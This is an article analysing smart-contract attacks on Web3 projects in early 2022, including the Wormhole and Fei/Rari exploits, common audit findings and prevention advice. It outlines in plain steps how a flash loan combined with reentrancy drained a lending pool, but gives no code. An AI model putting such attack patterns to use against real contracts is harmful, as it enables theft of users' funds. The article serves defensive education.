Analysis of Web3 Hacker Attack Techniques: Common Attack Methods and Prevention Strategies in the First Half of 2022

In the first half of 2022, the security situation in the Web3 field was not optimistic. Data shows that losses of approximately $644 million were caused solely by smart contract vulnerabilities, involving 42 major attack incidents. Among these attacks, logical or functional design flaws, verification issues, and reentrancy vulnerabilities were the most commonly exploited weaknesses by hackers.

Analysis of Major Loss Cases

1. Solana cross-chain bridge Wormhole was attacked: In February 2022, hackers exploited a signature verification vulnerability to successfully forge accounts and mint wETH, resulting in a loss of approximately $326 million.

2. Rari Fuse Pool under Fei Protocol was attacked: In April 2022, a Hacker exploited a flash loan combined with a re-entrancy attack to steal assets worth $80.34 million. This attack had a huge impact on the project, ultimately leading Fei Protocol to announce its closure in August.

Fei Protocol attack details:

• The attacker first obtains a flash loan from Balancer: Vault.
• Use borrowed funds to collateralize lending on Rari Capital while exploiting the reentrancy vulnerability in the cEther contract.
• By carefully designed attack functions, repeatedly call to extract all tokens from the pool.
• Finally, repay the flash loan and transfer the profits to the designated contract.

The core of this attack lies in exploiting the reentrancy vulnerability present in the cEther implementation contract of Rari Capital, ultimately resulting in the theft of over 28,380 ETH (approximately 80.34 million USD).

Common Vulnerability Types in Audits

1. ERC721/ERC1155 Reentrancy Attack: When using _safeMint(), _safeTransfer(), and other functions, if the callback function of the receiving contract contains malicious code, it may lead to a reentrancy attack.

2. Logical Flaw:

   • Insufficient consideration of special scenarios, such as self-transfer leading to an increase in assets out of thin air.
   • The functional design is not complete, for example, it lacks a withdrawal or settlement mechanism.

3. Missing access control: Key operations (such as minting, role settings, parameter adjustments) do not have appropriate permission controls set.

4. Price Manipulation Risk:

   • A non-time-weighted average price oracle system.
   • Directly using the asset ratio in the contract as a price basis is easily manipulated.

Exploitation of Vulnerabilities in Real Attacks

Statistics show that various vulnerabilities discovered during the audit process have almost all been exploited by hackers in actual environments, with contract logic vulnerabilities still being the primary target of attacks.

It is worth noting that through professional formal verification platforms for smart contracts and manual reviews by security experts, most of these vulnerabilities can be detected in a timely manner during the development phase. Security experts can also provide remediation suggestions based on specific situations, helping project teams enhance contract security.

Prevention Suggestions

1. Strengthen code auditing: Conduct regular comprehensive security audits, with a particular focus on logical design and handling of special scenarios.

2. Implement strict access control: Set up protection mechanisms such as multi-signature or time locks for critical functions.

3. Optimize Price Oracles: Use decentralized oracles and time-weighted average prices to reduce the risk of price manipulation.

4. Follow secure coding practices: Strictly implement the "Check-Effect-Interact" model to prevent reentrancy attacks.

5. Continuous Monitoring: Deploy a real-time monitoring system to promptly detect and respond to abnormal activities.

By taking these measures, Web3 projects can significantly enhance their security and reduce the risk of becoming targets for Hacker attacks. As technology continues to evolve, staying vigilant and continuously updating security strategies will be key to ensuring the long-term stable operation of the project.